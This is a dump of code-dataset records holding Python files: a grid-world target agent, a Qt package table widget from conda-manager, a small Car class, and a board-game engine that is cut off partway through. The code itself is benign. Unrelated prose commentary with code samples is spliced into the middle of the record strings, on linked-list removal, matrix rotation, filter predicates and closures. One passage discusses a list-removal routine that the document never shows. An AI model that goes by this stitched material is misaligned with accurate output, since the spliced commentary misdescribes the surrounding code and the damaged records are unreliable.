self.rewardMatrix[1][relative_y][relative_x]\n\t\t\n\t# whether the input location is be rewarded\n\tdef isReward(self,x,y):\n\t\tdiff_x = self.x - x\n\t\tdiff_y = self.y - y\n\t\tif abs(diff_x)>self.rewardRange or abs(diff_y)>self.rewardRange :\n\t\t\treturn False\n\t\treturn True\n\n\tdef possibleActions(self,GRIDS_X,GRIDS_Y):\n\t\tactions = []\n\n\t\tif self.x < GRIDS_X-1:\n\t\t\tactions.append('east')\n\t\tif self.x > 0:\n\t\t\tactions.append('west')\n\t\tif self.y < GRIDS_Y-1:\n\t\t\tactions.append('south')\n\t\tif self.y > 
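
The removal above rebuilds the whole list from an array, costing O(n) extra space; the classic two-pointer variant does it in one pass with O(1) space. A self-contained sketch with a local ListNode:

    class ListNode:
        def __init__(self, val=0, next=None):
            self.val = val
            self.next = next

    def remove_nth_from_end(head, n):
        # Advance a lead pointer n steps, then move both pointers until
        # lead falls off the end; trail then sits just before the node to cut.
        dummy = ListNode(0, head)
        lead = trail = dummy
        for _ in range(n):
            lead = lead.next
        while lead.next:
            lead = lead.next
            trail = trail.next
        trail.next = trail.next.next
        return dummy.next

    # 1 -> 2 -> 3 with n=2 leaves 1 -> 3.
    head = ListNode(1, ListNode(2, ListNode(3)))
    head = remove_nth_from_end(head, 2)
    while head:
        print(head.val)
        head = head.next

The dummy node also handles the edge case of removing the head itself, which the array version covers with its explicit length checks.
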
0:\n\t\t\tactions.append('north')\n\n\t\treturn actions\n\t\n\tdef backUp(self):\n\t\tself.backX, self.bakcY = self.x, self.y\n\t\tself.backLx, self.backLy = self.lastX, self.lastY\n\t\tself.backF, self.backLF = self.face, self.lastFace\n\t\tself.backFA, self.backLFA = self.faceAngle, self.lastFaceAngle\n\n\tdef recoverBackUp(self):\n\t\tself.x, self.y = self.backX, self.bakcY\n\t\tself.lastX, self.lastY = self.backLx, self.backLy\n\t\tself.face, self.lastFace = self.backF, self.backLF\n\t\tself.faceAngle, self.lastFaceAngle = self.backFA, self.backLFA\n\n\tdef AImove(self,action):\n\t\tself.lastX,self.lastY= self.x,self.y\n\t\tself.lastFace, self.lastFaceAngle = self.face, self.faceAngle\n\n\t\tif action == 'east':\n\t\t\tself.x += 1\n\t\telif action == 'west':\n\t\t\tself.x -= 1\n\t\telif action == 'north':\n\t\t\tself.y -= 1\n\t\telif action == 'south':\n\t\t\tself.y += 1\n\t\telse:\n\t\t\tNone\n\t\tif self.x - self.lastX > 0:\n\t\t\tself.face = 0 # east\n\t\telif self.x - self.lastX < 0:\n\t\t\tself.face = 180 # west\n\t\telse:\n\t\t\tif self.y - self.lastY >0:\n\t\t\t\tself.face = 270 # south\n\t\t\telse:\n\t\t\t\tself.face = 90 # north\n\t\t\t\t\n\n\tdef undo(self):\n\t\tself.x = self.lastX\n\t\tself.y = self.lastY\n\t\tself.faceAngle = self.lastFaceAngle\n\t\tself.face = self.lastFace\n\t\tself.computeRewardMatrix()\n\n# agent = Target(1,3)\n# print agent.rewardMatrix\n# print (agent.x, agent.y, agent.face, agent.faceAngle)\n# print 'move-------------'\n# agent.randmove(20,20)\n# print (agent.lastX, agent.lastY, agent.lastFace, agent.lastFaceAngle)\n# print (agent.x, agent.y, agent.face, agent.faceAngle)\n# agent.computeRewardMatrix(agent.x, agent.y, agent.face, agent.faceAngle)\n# print agent.rewardMatrix\n# print 'move-------------'\n# agent.randmove(20,20)\n# print (agent.lastX, agent.lastY, agent.lastFace, agent.lastFaceAngle)\n# print (agent.x, agent.y, agent.face, agent.faceAngle)\n# agent.computeRewardMatrix(agent.x, agent.y, agent.face, agent.faceAngle)\n# print agent.rewardMatrix\n\n\n\n\n","repo_name":"GnawXam/cs221_ai_final_project","sub_path":"target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":6477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39032828931","text":"from __future__ import (division, print_function, unicode_literals,\n with_statement)\n\n# Standard library imports\nimport gettext\n\n# Third party imports\nfrom qtpy import PYQT5\nfrom qtpy.QtCore import Qt, QPoint, QSize, QUrl, Signal, QEvent\nfrom qtpy.QtGui import QColor, QDesktopServices, QIcon, QPen, QBrush\nfrom qtpy.QtWidgets import (QAbstractItemView, QItemDelegate, QMenu,\n QTableView)\n\n# Local imports\nfrom conda_manager.models.filter import MultiColumnSortFilterProxy\nfrom conda_manager.models.packages import CondaPackagesModel\nfrom conda_manager.utils import get_image_path\nfrom conda_manager.utils import constants as const\nfrom conda_manager.utils.py3compat import to_text_string\nfrom conda_manager.utils.qthelpers import add_actions, create_action\n\n\n_ = gettext.gettext\nHIDE_COLUMNS = [const.COL_START, const.COL_STATUS, const.COL_URL,\n const.COL_LICENSE, const.COL_REMOVE, const.COL_ACTION_VERSION,\n const.COL_END]\n\n\nclass CustomDelegate(QItemDelegate):\n pass\n# def paint(self, painter, option, index):\n# QItemDelegate.paint(self, painter, option, index)\n# column = index.column()\n# row = index.row()\n# rect = option.rect\n#\n# # Draw borders\n# pen = QPen()\n# pen.setWidth(1)\n# 
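
computeRewardMatrix above stores the matrix together with the heading it currently represents and calls np.rot90 until the two agree. Here is that bookkeeping in isolation (the 3x3 values and target heading are made up):

    import numpy as np

    # [orientation_in_degrees, matrix] -- same shape as self.rewardMatrix.
    reward = [0, np.array([[0, 1, 0],
                           [0, 0, 2],
                           [0, 0, 0]])]
    target_facing = 270

    # Rotate 90 degrees at a time until the stored orientation matches.
    while reward[0] % 360 != target_facing % 360:
        reward[1] = np.rot90(reward[1])
        reward[0] = (reward[0] + 90) % 360

    print(reward[1])

np.rot90 rotates counterclockwise, so the loop runs at most three times; keeping the angle alongside the matrix avoids recomputing the reward layout from scratch on every move.
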
pen.setColor(QColor('#cdcdcd'))\n# painter.setPen(pen)\n# painter.drawLine(rect.topLeft(), rect.topRight())\n#\n# if (row == self.current_hover_row() or row == self.current_row() and\n# (self.has_focus_or_context())):\n# brush = QBrush(Qt.SolidPattern)\n# brush.setColor(QColor(255, 255, 255, 100))\n# painter.fillRect(rect, brush)\n# if row == self.current_row() and column in [const.COL_START]:\n# pen = QPen()\n# pen.setWidth(10)\n# pen.setColor(QColor('#7cbb4c'))\n# painter.setPen(pen)\n# dyt = QPoint(0, 5)\n# dyb = QPoint(0, 4)\n# painter.drawLine(rect.bottomLeft()-dyb, rect.topLeft()+dyt)\n#\n# def sizeHint(self, style, model_index):\n# column = model_index.column()\n# if column in [const.COL_PACKAGE_TYPE] + [const.ACTION_COLUMNS,\n# const.COL_PACKAGE_TYPE]:\n# return QSize(24, 24)\n# else:\n# return QItemDelegate.sizeHint(self, style, model_index)\n\n\nclass TableCondaPackages(QTableView):\n \"\"\" \"\"\"\n WIDTH_TYPE = 24\n WIDTH_NAME = 120\n WIDTH_ACTIONS = 24\n WIDTH_VERSION = 90\n\n sig_status_updated = Signal(str, bool, list, bool)\n sig_conda_action_requested = Signal(str, int, str, object, object)\n sig_pip_action_requested = Signal(str, int)\n sig_actions_updated = Signal(int)\n sig_next_focus = Signal()\n sig_previous_focus = Signal()\n\n def __init__(self, parent):\n super(TableCondaPackages, self).__init__(parent)\n self._parent = parent\n self._searchbox = u''\n self._filterbox = const.ALL\n self._delegate = CustomDelegate(self)\n self.row_count = None\n self._advanced_mode = True\n self._current_hover_row = None\n self._menu = None\n self._palette = {}\n\n # To manage icon states\n self._model_index_clicked = None\n self.valid = False\n self.column_ = None\n self.current_index = None\n\n # To prevent triggering the keyrelease after closing a dialog\n # but hititng enter on it\n self.pressed_here = False\n\n self.source_model = None\n self.proxy_model = None\n\n self.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.setSelectionMode(QAbstractItemView.SingleSelection)\n self.verticalHeader().hide()\n self.setSortingEnabled(True)\n self.setMouseTracking(True)\n\n self.setAlternatingRowColors(True)\n self._delegate.current_row = self.current_row\n self._delegate.current_hover_row = self.current_hover_row\n self._delegate.update_index = self.update\n self._delegate.has_focus_or_context = self.has_focus_or_context\n self.setItemDelegate(self._delegate)\n self.setShowGrid(False)\n self.setWordWrap(True)\n self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.horizontalHeader().setStretchLastSection(True)\n\n # Header setup\n self._hheader = self.horizontalHeader()\n if PYQT5:\n self._hheader.setSectionResizeMode(self._hheader.Fixed)\n else:\n self._hheader.setResizeMode(self._hheader.Fixed)\n# self._hheader.setStyleSheet(\"\"\"QHeaderView {border: 0px;\n# border-radius: 0px;};\n# \"\"\")\n self.sortByColumn(const.COL_NAME, Qt.AscendingOrder)\n self.setContextMenuPolicy(Qt.CustomContextMenu)\n self.hide_columns()\n\n def setup_model(self, packages, data, metadata_links={}):\n \"\"\" \"\"\"\n self.proxy_model = MultiColumnSortFilterProxy(self)\n self.source_model = CondaPackagesModel(self, packages, data)\n self.proxy_model.setSourceModel(self.source_model)\n self.setModel(self.proxy_model)\n self.metadata_links = metadata_links\n\n # FIXME: packages sizes... 
move to a better place?\n packages_sizes = {}\n for name in packages:\n packages_sizes[name] = packages[name].get('size')\n self._packages_sizes = packages_sizes\n\n # Custom Proxy Model setup\n self.proxy_model.setDynamicSortFilter(True)\n\n filter_text = \\\n (lambda row, text, status: (\n all([t in row[const.COL_NAME].lower() for t in\n to_text_string(text).lower().split()]) or\n all([t in row[const.COL_DESCRIPTION].lower() for t in\n to_text_string(text).split()])))\n\n filter_status = (lambda row, text, status:\n to_text_string(row[const.COL_STATUS]) in\n to_text_string(status))\n self.model().add_filter_function('status-search', filter_status)\n self.model().add_filter_function('text-search', filter_text)\n\n # Signals and slots\n self.verticalScrollBar().valueChanged.connect(self.resize_rows)\n\n self.hide_columns()\n self.resize_rows()\n self.refresh_actions()\n self.source_model.update_style_palette(self._palette)\n\n def update_style_palette(self, palette={}):\n self._palette = palette\n\n def resize_rows(self):\n \"\"\" \"\"\"\n delta_y = 10\n height = self.height()\n y = 0\n while y < height:\n row = self.rowAt(y)\n self.resizeRowToContents(row)\n row_height = self.rowHeight(row)\n self.setRowHeight(row, row_height + delta_y)\n y += self.rowHeight(row) + delta_y\n\n def hide_columns(self):\n \"\"\" \"\"\"\n for col in const.COLUMNS:\n self.showColumn(col)\n\n hide = HIDE_COLUMNS\n if self._advanced_mode:\n columns = const.ACTION_COLUMNS[:]\n columns.remove(const.COL_ACTION)\n hide += columns\n else:\n hide += [const.COL_ACTION]\n\n for col in hide:\n self.hideColumn(col)\n\n def filter_changed(self):\n \"\"\"Trigger the filter\"\"\"\n group = self._filterbox\n text = self._searchbox\n\n if group in [const.ALL]:\n group = ''.join([to_text_string(const.INSTALLED),\n to_text_string(const.UPGRADABLE),\n to_text_string(const.NOT_INSTALLED),\n to_text_string(const.DOWNGRADABLE),\n to_text_string(const.MIXGRADABLE)])\n elif group in [const.INSTALLED]:\n group = ''.join([to_text_string(const.INSTALLED),\n to_text_string(const.UPGRADABLE),\n to_text_string(const.DOWNGRADABLE),\n to_text_string(const.MIXGRADABLE)])\n elif group in [const.UPGRADABLE]:\n group = ''.join([to_text_string(const.UPGRADABLE),\n to_text_string(const.MIXGRADABLE)])\n elif group in [const.DOWNGRADABLE]:\n group = ''.join([to_text_string(const.DOWNGRADABLE),\n to_text_string(const.MIXGRADABLE)])\n else:\n group = to_text_string(group)\n\n if self.proxy_model is not None:\n self.proxy_model.set_filter(text, group)\n self.resize_rows()\n\n # Update label count\n count = self.verticalHeader().count()\n if count == 0:\n count_text = _(\"0 packages available \")\n elif count == 1:\n count_text = _(\"1 package available \")\n elif count > 1:\n count_text = to_text_string(count) + _(\" packages available \")\n\n if text != '':\n count_text = count_text + _('matching \"{0}\"').format(text)\n\n self.sig_status_updated.emit(count_text, False, [0, 0], True)\n\n def search_string_changed(self, text):\n \"\"\" \"\"\"\n text = to_text_string(text)\n self._searchbox = text\n self.filter_changed()\n\n def filter_status_changed(self, text):\n \"\"\" \"\"\"\n if text not in const.PACKAGE_STATUS:\n text = const.PACKAGE_STATUS[text]\n\n for key in const.COMBOBOX_VALUES:\n val = const.COMBOBOX_VALUES[key]\n if to_text_string(val) == to_text_string(text):\n group = val\n break\n self._filterbox = group\n self.filter_changed()\n\n def resizeEvent(self, event):\n \"\"\"Override Qt method\"\"\"\n w = self.width()\n width_start = 20\n 
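
The two lambdas registered with add_filter_function above follow a generic pattern: named row predicates that the proxy model ANDs together when deciding visibility. Stripped of Qt, the pattern looks like this (the row layout and filter names are illustrative):

    # Named predicates, ANDed together -- mirrors add_filter_function().
    filters = {}

    def add_filter_function(name, func):
        filters[name] = func

    add_filter_function(
        'text-search',
        lambda row, text, status: text.lower() in row['name'].lower())
    add_filter_function(
        'status-search',
        lambda row, text, status: str(row['status']) in status)

    rows = [{'name': 'numpy', 'status': 1}, {'name': 'pandas', 'status': 2}]
    text, status = 'num', '13'
    visible = [r for r in rows if all(f(r, text, status) for f in filters.values())]
    print([r['name'] for r in visible])  # ['numpy']

Keeping the predicates in a registry means filter_changed only has to update the text/status inputs; the proxy re-evaluates every registered function per row.
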
width_end = width_start\n\n if self._advanced_mode:\n action_cols = [const.COL_ACTION]\n else:\n action_cols = [const.COL_UPGRADE, const.COL_INSTALL,\n const.COL_REMOVE, const.COL_DOWNGRADE]\n\n self.setColumnWidth(const.COL_START, width_start)\n self.setColumnWidth(const.COL_PACKAGE_TYPE, self.WIDTH_TYPE)\n self.setColumnWidth(const.COL_NAME, self.WIDTH_NAME)\n self.setColumnWidth(const.COL_VERSION, self.WIDTH_VERSION)\n w_new = w - (width_start + self.WIDTH_ACTIONS + self.WIDTH_TYPE +\n self.WIDTH_NAME + self.WIDTH_VERSION +\n (len(action_cols))*self.WIDTH_ACTIONS + width_end)\n self.setColumnWidth(const.COL_DESCRIPTION, w_new)\n self.setColumnWidth(const.COL_END, width_end)\n\n for col in action_cols:\n self.setColumnWidth(col, self.WIDTH_ACTIONS)\n QTableView.resizeEvent(self, event)\n self.resize_rows()\n\n def update_visible_rows(self):\n current_index = self.currentIndex()\n row = current_index.row()\n\n if self.proxy_model:\n for r in range(row - 50, row + 50):\n for co in const.COLUMNS:\n index = self.proxy_model.index(r, co)\n self.update(index)\n self.resize_rows()\n\n def current_row(self):\n\n if self._menu and self._menu.isVisible():\n return self.currentIndex().row()\n elif self.hasFocus():\n return self.currentIndex().row()\n else:\n return -1\n\n def current_hover_row(self):\n return self._current_hover_row\n\n def has_focus_or_context(self):\n return self.hasFocus() or (self._menu and self._menu.isVisible())\n\n def mouseMoveEvent(self, event):\n super(TableCondaPackages, self).mouseMoveEvent(event)\n pos = event.pos()\n self._current_hover_row = self.rowAt(pos.y())\n\n def leaveEvent(self, event):\n super(TableCondaPackages, self).leaveEvent(event)\n self._current_hover_row = None\n\n def keyPressEvent(self, event):\n \"\"\"\n Override Qt method.\n \"\"\"\n index = self.currentIndex()\n key = event.key()\n if key in [Qt.Key_Enter, Qt.Key_Return]:\n # self.action_pressed(index)\n self.setCurrentIndex(self.proxy_model.index(index.row(),\n const.COL_ACTION))\n self.pressed_here = True\n elif key in [Qt.Key_Tab]:\n new_row = index.row() + 1\n if not self.proxy_model or new_row == self.proxy_model.rowCount():\n self.sig_next_focus.emit()\n else:\n new_index = self.proxy_model.index(new_row, 0)\n self.setCurrentIndex(new_index)\n elif key in [Qt.Key_Backtab]:\n new_row = index.row() - 1\n if new_row < 0:\n self.sig_previous_focus.emit()\n else:\n new_index = self.proxy_model.index(new_row, 0)\n self.setCurrentIndex(new_index)\n else:\n QTableView.keyPressEvent(self, event)\n\n self.update_visible_rows()\n\n def keyReleaseEvent(self, event):\n \"\"\"Override Qt method\"\"\"\n QTableView.keyReleaseEvent(self, event)\n key = event.key()\n index = self.currentIndex()\n if key in [Qt.Key_Enter, Qt.Key_Return] and self.pressed_here:\n self.context_menu_requested(event)\n# self.action_released()\n elif key in [Qt.Key_Menu]:\n self.setCurrentIndex(self.proxy_model.index(index.row(),\n const.COL_ACTION))\n self.context_menu_requested(event, right_click=True)\n self.pressed_here = False\n self.update_visible_rows()\n\n def mousePressEvent(self, event):\n \"\"\"Override Qt method\"\"\"\n QTableView.mousePressEvent(self, event)\n self.current_index = self.currentIndex()\n column = self.current_index.column()\n\n if event.button() == Qt.LeftButton and column == const.COL_ACTION:\n pos = QPoint(event.x(), event.y())\n index = self.indexAt(pos)\n self.action_pressed(index)\n self.context_menu_requested(event)\n elif event.button() == Qt.RightButton:\n self.context_menu_requested(event, 
right_click=True)\n self.update_visible_rows()\n\n def mouseReleaseEvent(self, event):\n \"\"\"Override Qt method\"\"\"\n if event.button() == Qt.LeftButton:\n self.action_released()\n self.update_visible_rows()\n\n def action_pressed(self, index):\n \"\"\"\n DEPRECATED\n \"\"\"\n column = index.column()\n\n if self.proxy_model is not None:\n model_index = self.proxy_model.mapToSource(index)\n model = self.source_model\n\n self._model_index_clicked = model_index\n self.valid = True\n\n if (column == const.COL_INSTALL and\n model.is_installable(model_index)):\n model.update_row_icon(model_index.row(), const.COL_INSTALL)\n\n elif (column == const.COL_INSTALL and\n model.is_removable(model_index)):\n model.update_row_icon(model_index.row(), const.COL_REMOVE)\n\n elif ((column == const.COL_UPGRADE and\n model.is_upgradable(model_index)) or\n (column == const.COL_DOWNGRADE and\n model.is_downgradable(model_index))):\n model.update_row_icon(model_index.row(), model_index.column())\n\n else:\n self._model_index_clicked = None\n self.valid = False\n\n def action_released(self):\n \"\"\"\n DEPRECATED\n \"\"\"\n model = self.source_model\n model_index = self._model_index_clicked\n\n actions = {const.COL_INSTALL: const.ACTION_INSTALL,\n const.COL_REMOVE: const.ACTION_REMOVE,\n const.COL_UPGRADE: const.ACTION_UPGRADE,\n const.COL_DOWNGRADE: const.ACTION_DOWNGRADE,\n }\n\n if model_index:\n column = model_index.column()\n\n if column == const.COL_INSTALL and model.is_removable(model_index):\n column = const.COL_REMOVE\n self.source_model.update_row_icon(model_index.row(), column)\n\n if self.valid:\n row_data = self.source_model.row(model_index.row())\n type_ = row_data[const.COL_PACKAGE_TYPE]\n name = row_data[const.COL_NAME]\n version = self.source_model.get_package_version(name)\n versions = self.source_model.get_package_versions(name)\n\n if not versions:\n versions = [version]\n\n action = actions.get(column, None)\n\n if type_ == const.CONDA_PACKAGE:\n self.sig_conda_action_requested.emit(name, action, version,\n versions,\n self._packages_sizes)\n elif type_ == const.PIP_PACKAGE:\n self.sig_pip_action_requested.emit(name, action)\n else:\n pass\n\n def set_advanced_mode(self, value=True):\n self._advanced_mode = value\n# self.resizeEvent(None)\n\n def set_action_status(self, model_index, status=const.ACTION_NONE,\n version=None):\n self.source_model.set_action_status(model_index, status, version)\n self.refresh_actions()\n\n def context_menu_requested(self, event, right_click=False):\n \"\"\"\n Custom context menu.\n \"\"\"\n if self.proxy_model is None:\n return\n\n self._menu = QMenu(self)\n index = self.currentIndex()\n model_index = self.proxy_model.mapToSource(index)\n row_data = self.source_model.row(model_index.row())\n column = model_index.column()\n name = row_data[const.COL_NAME]\n # package_type = row_data[const.COL_PACKAGE_TYPE]\n versions = self.source_model.get_package_versions(name)\n current_version = self.source_model.get_package_version(name)\n\n# if column in [const.COL_ACTION, const.COL_VERSION, const.COL_NAME]:\n if column in [const.COL_ACTION] and not right_click:\n is_installable = self.source_model.is_installable(model_index)\n is_removable = self.source_model.is_removable(model_index)\n is_upgradable = self.source_model.is_upgradable(model_index)\n\n action_status = self.source_model.action_status(model_index)\n actions = []\n action_unmark = create_action(\n self,\n _('Unmark'),\n triggered=lambda: self.set_action_status(model_index,\n const.ACTION_NONE,\n 
current_version))\n action_install = create_action(\n self,\n _('Mark for installation'),\n triggered=lambda: self.set_action_status(model_index,\n const.ACTION_INSTALL,\n versions[-1]))\n action_upgrade = create_action(\n self,\n _('Mark for upgrade'),\n triggered=lambda: self.set_action_status(model_index,\n const.ACTION_UPGRADE,\n versions[-1]))\n action_remove = create_action(\n self,\n _('Mark for removal'),\n triggered=lambda: self.set_action_status(model_index,\n const.ACTION_REMOVE,\n current_version))\n\n version_actions = []\n for version in reversed(versions):\n def trigger(model_index=model_index,\n action=const.ACTION_INSTALL,\n version=version):\n return lambda: self.set_action_status(model_index,\n status=action,\n version=version)\n if version == current_version:\n version_action = create_action(\n self,\n version,\n icon=QIcon(),\n triggered=trigger(model_index,\n const.ACTION_INSTALL,\n version))\n if not is_installable:\n version_action.setCheckable(True)\n version_action.setChecked(True)\n version_action.setDisabled(True)\n elif version != current_version:\n if ((version in versions and versions.index(version)) >\n (current_version in versions and\n versions.index(current_version))):\n upgrade_or_downgrade_action = const.ACTION_UPGRADE\n else:\n upgrade_or_downgrade_action = const.ACTION_DOWNGRADE\n\n if is_installable:\n upgrade_or_downgrade_action = const.ACTION_INSTALL\n\n version_action = create_action(\n self,\n version,\n icon=QIcon(),\n triggered=trigger(model_index,\n upgrade_or_downgrade_action,\n version))\n\n version_actions.append(version_action)\n\n install_versions_menu = QMenu('Mark for specific version '\n 'installation', self)\n add_actions(install_versions_menu, version_actions)\n actions = [action_unmark, action_install, action_upgrade,\n action_remove]\n actions += [None, install_versions_menu]\n install_versions_menu.setEnabled(len(version_actions) > 1)\n\n if action_status is const.ACTION_NONE:\n action_unmark.setDisabled(True)\n action_install.setDisabled(not is_installable)\n action_upgrade.setDisabled(not is_upgradable)\n action_remove.setDisabled(not is_removable)\n install_versions_menu.setDisabled(False)\n else:\n action_unmark.setDisabled(False)\n action_install.setDisabled(True)\n action_upgrade.setDisabled(True)\n action_remove.setDisabled(True)\n install_versions_menu.setDisabled(True)\n\n elif right_click:\n license_ = row_data[const.COL_LICENSE]\n\n metadata = self.metadata_links.get(name, {})\n pypi = metadata.get('pypi', '')\n home = metadata.get('home', '')\n dev = metadata.get('dev', '')\n docs = metadata.get('docs', '')\n\n q_pypi = QIcon(get_image_path('python.png'))\n q_home = QIcon(get_image_path('home.png'))\n q_docs = QIcon(get_image_path('conda_docs.png'))\n\n if 'git' in dev:\n q_dev = QIcon(get_image_path('conda_github.png'))\n elif 'bitbucket' in dev:\n q_dev = QIcon(get_image_path('conda_bitbucket.png'))\n else:\n q_dev = QIcon()\n\n if 'mit' in license_.lower():\n lic = 'http://opensource.org/licenses/MIT'\n elif 'bsd' == license_.lower():\n lic = 'http://opensource.org/licenses/BSD-3-Clause'\n else:\n lic = None\n\n actions = []\n\n if license_ != '':\n actions.append(create_action(self, _('License: ' + license_),\n icon=QIcon(), triggered=lambda:\n self.open_url(lic)))\n actions.append(None)\n\n if pypi != '':\n actions.append(create_action(self, _('Python Package Index'),\n icon=q_pypi, triggered=lambda:\n self.open_url(pypi)))\n if home != '':\n actions.append(create_action(self, _('Homepage'),\n icon=q_home, 
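
The nested trigger() factory above exists to defeat Python's late-binding closures: without it, every version action built in the loop would fire with the loop's final version value. The effect in miniature:

    # Closures capture variables, not values, so every lambda built in a
    # loop sees the loop variable's final value unless it is bound early.
    late = [lambda: v for v in ('1.0', '2.0', '3.0')]
    print([f() for f in late])    # ['3.0', '3.0', '3.0'] -- all share v

    # Binding through a default argument (or a factory function, as the
    # code above does) freezes each iteration's value at definition time.
    bound = [lambda v=v: v for v in ('1.0', '2.0', '3.0')]
    print([f() for f in bound])   # ['1.0', '2.0', '3.0']
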
triggered=lambda:\n self.open_url(home)))\n if docs != '':\n actions.append(create_action(self, _('Documentation'),\n icon=q_docs, triggered=lambda:\n self.open_url(docs)))\n if dev != '':\n actions.append(create_action(self, _('Development'),\n icon=q_dev, triggered=lambda:\n self.open_url(dev)))\n if actions and len(actions) > 1:\n # self._menu = QMenu(self)\n add_actions(self._menu, actions)\n\n if event.type() == QEvent.KeyRelease:\n rect = self.visualRect(index)\n global_pos = self.viewport().mapToGlobal(rect.bottomRight())\n else:\n pos = QPoint(event.x(), event.y())\n global_pos = self.viewport().mapToGlobal(pos)\n\n self._menu.popup(global_pos)\n\n def get_actions(self):\n if self.source_model:\n return self.source_model.get_actions()\n\n def clear_actions(self):\n index = self.currentIndex()\n if self.source_model:\n self.source_model.clear_actions()\n self.refresh_actions()\n self.setFocus()\n self.setCurrentIndex(index)\n\n def refresh_actions(self):\n if self.source_model:\n actions_per_package_type = self.source_model.get_actions()\n number_of_actions = 0\n for type_ in actions_per_package_type:\n actions = actions_per_package_type[type_]\n for key in actions:\n data = actions[key]\n number_of_actions += len(data)\n self.sig_actions_updated.emit(number_of_actions)\n\n def open_url(self, url):\n \"\"\"\n Open link from action in default operating system browser.\n \"\"\"\n if url is None:\n return\n QDesktopServices.openUrl(QUrl(url))\n","repo_name":"spyder-ide/conda-manager","sub_path":"conda_manager/widgets/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":26653,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"2149587951","text":"class Car:\n\n def __init__(self, regno, no_gears):\n self.regno = regno\n self.no_gears = no_gears\n self.is_started = False\n\n def start(self):\n if self.is_started:\n print(f\"car with reg_no: {self.regno} is already started\")\n else:\n print(f\"car with reg_no: {self.regno} started....\")\n self.is_started = True\n \n def stop(self):\n if self.is_started:\n print(f\"car with reg_no: {self.regno} stopped....\")\n self.is_started = False\n else:\n print(f\"car with reg_no: {self.regno} has already stopped....\")\n \n\n def change_gear(self):\n if self.is_started:\n print(f\"car with reg_no: {self.regno} changed gear....\")\n else:\n print(f\"car with reg_no: {self.regno} has already stopped... 
can't change gear....\")\n \nif __name__ == \"__main__\":\n bmw = Car(\"KA01300\",5)\n audi = Car(\"KA450067\",6)\n bmw.start()\n bmw.change_gear()\n bmw.stop()\n bmw.stop()\n bmw.change_gear()\n\n audi.start()\n audi.stop()\n audi.change_gear()","repo_name":"Lehan-Max/Python","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2288924513","text":"import sys\nfrom collections import deque\nfrom random import shuffle, choice\n\nfrom .decks import get_old_gods, get_player_relic_decks, get_summon_deck, EvilStirs, RoleManager\nfrom .player import Player\nfrom .printer import print_elder_map\nfrom .utils import PandemicObject, get_input, SKIP_SUMMON, SKIP_SANITY_CHECKS, SEAL_GATE_BASE_COST, \\\n REDUCE_SEAL_COST, DETECTIVE, MAGICIAN, confirm, get_num_players\n\n\nclass GameBoard(object):\n mode = 'cli'\n id = 0\n cultist_reserve = 20\n shoggoth_reserve = 3\n player_deck = None\n player_discards = None\n summon_deck = None\n summon_discards = None\n relic_deck = None\n old_gods = None\n effects = None\n _effect_tracker = None # depreciate by 1 each turn. Allows effect to persist across turns\n players = None\n locations = None\n towns = None\n current_player = None\n current_actions = 4 # will want to use this instead of while loop, eventually\n stream = sys.stdout\n lose_condition = False\n win_condition = True\n\n def __init__(self, num_players=False, stream=None, auto=False):\n self.player_deck = []\n self.player_discards = []\n self.summon_deck = deque([])\n self.summon_discards = []\n self.relic_deck = []\n self.old_gods = []\n self.effects = []\n self.effect_tracker = {}\n self.players = []\n self.locations = {}\n self.towns = []\n self.old_gods = get_old_gods(self)\n self.num_players = num_players\n self.auto = auto\n self.rm = RoleManager()\n\n if stream:\n self.stream = stream\n\n def announce(self, msg):\n \"\"\" The game is only text based now so it just prints to stdout\n\n :param msg: message to print\n :return:\n \"\"\"\n if self.stream:\n print(msg, file=self.stream)\n\n def show_board(self):\n print_elder_map(self)\n\n def _setup_locations(self):\n kingsport = Town('Kingsport')\n innsmouth = Town('Innsmouth')\n dunwich = Town('Dunwich')\n arkham = Town('Arkham')\n kingsport.connections = [innsmouth, dunwich]\n innsmouth.connections = [arkham, kingsport]\n dunwich.connections = [arkham, kingsport]\n arkham.connections = [innsmouth, dunwich]\n self.towns = [arkham, innsmouth, dunwich, kingsport]\n\n locations = [\n Location('Train Station', town=arkham, bus_stop=True, gate=False),\n Location('University', town=arkham, bus_stop=False, gate=False),\n Location('Park', town=arkham, bus_stop=False, gate=True),\n Location('Secret Lodge', town=arkham, bus_stop=False, gate=False),\n Location('Police Station', town=arkham, bus_stop=False, gate=False),\n Location('Diner', town=arkham, bus_stop=True, gate=False),\n Location('Cafe', town=dunwich, bus_stop=False, gate=False),\n Location('Old Mill', town=dunwich, bus_stop=False, gate=True),\n Location('Church', town=dunwich, bus_stop=False, gate=False),\n Location('Farmstead', town=dunwich, bus_stop=False, gate=False),\n Location('Swamp', town=dunwich, bus_stop=False, gate=False),\n Location('Historic Inn', town=dunwich, bus_stop=True, gate=False),\n Location('Great Hall', town=kingsport, bus_stop=False, gate=False),\n Location('Woods', town=kingsport, bus_stop=False, gate=False),\n Location('Market', 
town=kingsport, bus_stop=True, gate=False),\n Location('Theater', town=kingsport, bus_stop=False, gate=False),\n Location('Wharf', town=kingsport, bus_stop=False, gate=False),\n Location('Graveyard', town=kingsport, bus_stop=False, gate=True),\n Location('Junkyard', town=innsmouth, bus_stop=False, gate=False),\n Location('Pawn Shop', town=innsmouth, bus_stop=False, gate=False),\n Location('Hospital', town=innsmouth, bus_stop=False, gate=True),\n Location('Factory', town=innsmouth, bus_stop=True, gate=False),\n Location('Docks', town=innsmouth, bus_stop=False, gate=False),\n Location('Boardwalk', town=innsmouth, bus_stop=False, gate=False),\n ]\n self.locations = {location.name: location for location in locations}\n\n def add_conn(*args):\n start = args[0]\n conns = args[1:]\n if isinstance(conns, str):\n conns = [conns]\n self.locations[start].connections = [self.locations[conn] for conn in conns]\n\n add_conn('Train Station', 'Cafe', 'University')\n add_conn('University', 'Train Station', 'Park', 'Police Station')\n add_conn('Park', 'University', 'Police Station', 'Secret Lodge')\n add_conn('Police Station', 'University', 'Park', 'Secret Lodge')\n add_conn('Secret Lodge', 'Park', 'Police Station', 'Diner')\n add_conn('Diner', 'Secret Lodge', 'Junkyard')\n add_conn('Cafe', 'Train Station', 'Church')\n add_conn('Old Mill', 'Church')\n 